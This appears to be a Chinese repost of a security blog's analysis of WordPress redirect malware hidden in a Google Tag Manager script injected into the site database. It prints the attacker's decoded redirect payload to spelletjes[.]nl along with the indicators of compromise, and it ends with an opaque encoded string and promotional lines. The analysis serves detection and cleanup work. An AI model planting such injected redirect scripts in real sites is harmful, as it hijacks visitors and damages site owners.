WordPress重定向恶意软件隐藏在Google Tag Manager代码中
Puja Srivastava / 2025年7月17日
上个月,一位客户在发现其WordPress网站意外重定向至一个垃圾域名后联系了我们。重定向发生在用户访问网站大约4-5秒后。
通过对网站源代码的仔细检查,我们发现了一个可疑的Google Tag Manager加载项。
这不是我们第一次看到GTM被滥用。今年早些时候,我们分析了一次信用卡盗刷攻击,攻击者通过GTM容器注入了支付嗅探器。
这篇博客文章详细介绍了我们对此次攻击活动的全面调查,包括其注入方式、工作原理以及我们如何将其清除。
我们发现了什么?
感染并非存在于主题或插件文件中,而是直接隐藏在WordPress数据库内部。攻击者使用他们控制的一个容器ID,注入了一段看似合法的Google Tag Manager脚本。
被注入的代码从以下地址加载一个远程JavaScript文件:https://www.googletagmanager.com/gtm.js?id=GTM-PL2J2GLH
该脚本将用户重定向到当前已知与垃圾邮件活动相关的域名spelletjes[.]nl。通过进一步分析,我们发现这个GTM容器被用于超过200个受感染的网站(根据PublicWWW的数据)。
攻击者将此代码添加到了wp_options表(选项名称为ihaf_insert_body)和wp_posts表中。
这使得攻击者无需访问文件系统即可执行恶意行为,使得基于文件的标准扫描器更难检测到感染。
攻击向量与入侵指标 (IoCs)
注入的脚本使用容器IDGTM-PL2J2GLH,并加载以下远程文件:hxxps://www[.]googletagmanager[.]com/gtm.js?id=GTM-PL2J2GLH
一旦加载,该脚本会使用JavaScript执行客户端重定向。整个负载由攻击者通过其GTM账户完全控制。由于它托管在广泛使用的服务googletagmanager.com上,因此这种重定向避开了许多常见的安全过滤器。
恶意软件分析
注入wp_options的 JavaScript
攻击者将以下代码放置在wp_options表的option_value中,使用的option_name值为ihaf_insert_body(ihaf代表“插入页眉和页脚”,该插件现称为 wpcode)。这很可能是由于管理员账户被入侵,通过wp-admin面板插入的。
此加载器的目的是从Google的CDN获取外部JavaScript,随后在客户端执行重定向。
GTM 容器中的恶意重定向脚本
最终发现,由攻击者远程托管和控制的负载中包含恶意重定向脚本。\u003Cscript type=\"text\/gtmscript\"\u003Ewindow.location.href=\"https:\/\/www.spelletjes[.]nl\/\";\u003C\/script\u003E
这个Unicode转义字符串解码后为:<script type="text/gtmscript">window.location.href="https://www.spelletjes.nl/";</script>
恶意软件的影响
这种感染导致网站访问者被强制重定向到spelletjes[.]nl,这是一个提供广告和游戏的网站。
重定向损害了用户信任和SEO,降低了转化率,并可能导致您的网站被安全扫描器或浏览器警告标记。此外,由于负载隐藏在看似合法的GTM脚本中,因此极具欺骗性。
修复步骤
要修复基于Google Tag Manager的恶意软件:
- 移除任何可疑的GTM标签。登录GTM,识别并删除任何可疑标签。
- 执行全面的网站扫描,以检测任何其他恶意软件或后门。
- 移除任何恶意脚本或后门文件。
- 确保Magento和所有扩展程序都更新了安全补丁。
- 定期监控网站流量和GTM中的任何异常活动。
- 使用双因素身份验证保护
wp-admin。
结论
这次攻击是一个绝佳的例子,说明了像Google Tag Manager这样的合法服务如何被网络犯罪分子滥用。通过将受信任的脚本标签放入数据库(很可能是由于wp-admin用户被入侵),并将其隐藏在显而易见的地方,攻击者能够远程控制网站并将流量重定向到可疑目的地,而无需修改任何主题文件。
如果您遇到重定向或怀疑您的网站已被入侵,我们的恶意软件研究团队可24/7为您提供帮助。
Puja Srivastava 是一名安全分析师,热衷于对抗新的和未被检测到的恶意软件威胁。在恶意软件研究和安全领域拥有超过7年的经验,Puja 磨练了她在检测、监控和清理网站恶意软件方面的技能。她的职责包括网站恶意软件修复、培训、交叉培训以及指导新员工和其他部门的分析师,以及处理升级问题。工作之余,Puja 喜欢探索新的地方和美食,在厨房尝试新食谱,以及下棋。
jZsKZdINXrVc9QY8XQ5Ax/HmrWATJet1GxUy2jBZcmN/p/QbTGvJP/lXL/a7Ct5kPyXdJaSn4iVPFPDiq0Hwiwo3Ks8eEMVD0x5ue5NKNUPeK1YQH4KDrM/4apRjN8+ejHuDQuvrhU552dugHgHdSw==
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
